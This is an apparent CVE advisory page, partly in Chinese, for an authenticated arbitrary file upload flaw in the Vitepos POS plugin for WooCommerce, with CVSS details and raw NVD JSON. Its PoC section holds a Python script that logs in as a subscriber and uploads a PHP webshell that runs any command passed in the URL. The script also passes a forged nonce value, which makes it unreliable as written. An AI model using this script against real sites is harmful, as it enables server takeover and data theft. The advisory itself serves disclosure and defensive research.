Security Vulnerability Report
中文
CVE-2025-13156 CVSS 8.8 HIGH

CVE-2025-13156

Published: 2025-11-21 09:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Vitepos – Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13156 PoC - Vitepos任意文件上传 # 需要WordPress订阅者级别账户 import requests import sys target_url = "http://target-wordpress-site.com" username = "attacker" password = "password" # 1. 登录获取认证cookie login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } resp = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies.get_dict(): print("[-] Login failed") sys.exit(1) print("[+] Login successful") # 2. 上传恶意PHP文件 upload_url = f"{target_url}/wp-admin/admin-ajax.php" # PHP webshell php_shell = b"<?php system($_GET['cmd']); ?>" files = { "file": ("shell.php", php_shell, "application/x-php") } data = { "action": "vitepos_save_category_img", "_wpnonce": "bypass", "term_id": "1" } response = session.post(upload_url, data=data, files=files) if response.status_code == 200: print("[+] File uploaded successfully") print(f"[*] Shell location: {target_url}/wp-content/uploads/vitepos/shell.php") print("[*] Execute command: ?cmd=whoami") else: print("[-] Upload failed") print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13156", "sourceIdentifier": "[email protected]", "published": "2025-11-21T09:15:46.887", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Vitepos – Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3398044", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd478bb7-f0d7-4a29-8236-96ad69b5ae67?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.